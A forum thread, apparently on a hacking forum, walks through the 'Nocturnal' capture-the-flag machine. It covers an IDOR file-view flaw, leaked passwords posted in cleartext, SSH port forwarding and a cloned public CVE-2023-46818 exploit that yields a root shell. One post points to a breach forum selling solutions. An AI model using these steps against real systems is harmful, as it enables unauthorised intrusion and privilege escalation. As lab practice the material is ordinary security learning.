[samuelballsiu1]

---

We can use this syntax to check our uploads:

nocturnal.htb/view.php?username=amanda&file=privacy.odt

but i doesnt make my revshell work idk why, any suggest?

log into site as Amanda

Download backup

Dump the DB

ssh as that user

check local ports for interesting things

how to download the sql dump I'm geting a 403.

Login as amanda:arHkG7HAI68X8s1J

Create backup with the password arHkG7HAI68X8s1J

and unzip with the same password arHkG7HAI68X8s1J

Thanks it worked. But how did you find the creds for that account?

find the privacy.odt file in amanda's files with bruteforcing the username at the /view.php endpoint. After you've done that you can unzip the .odt file and grep for "pass" to find the password for that account

[shrek99]

after download privacy.odt then unzip it contains file with passwd for amanda

[alwaysphenom2]

lost on root.
found service running on the box.
also found possible exploit but it need valid creds .
and i cannot find the creds

[GilbertoCostah]

lost on root.
found service running on the box.
also found possible exploit but it need valid creds .
and i cannot find the creds

the creds are default admin username "admin" and reused pass of tobias

[bl4cksku11]

Easy root:

Hidden Content

You must register or login to view this content.

That's it! Pwned. Enjoy

[v4lkiry4]

I have the same problem, did you solve it?

Anyone knows what to do, to get root, after logged in through ssh as tobias?

[pachon]

I don't know if you could share a step-by-step guide on how you obtained the flags.

[kkkgrukckhko]

here mate:

nocturnal.htb/view.php?username=amanda&file=privacy.odt

there u can see this message:

Dear Amanda,
Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.
The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.
Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.

Yours sincerely,
Nocturnal's IT team

[RedBlock]

I have shared quick user and root, not for free this time as i need some credits ?
If you don't have credits dm will share.
https://breachforums.hn/Thread-Nocturnal...r-and-root

[maxineLam]

here so u dont have to pay : Tobias Credentials (needed for further steps):
tobiaslowmotionapocalypse

1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb

2. Read user flag:
cat usert.txt

3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse

4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt

yo machakilos, could you explain why 127.0.0.1 is used instead of the ip addr of the box?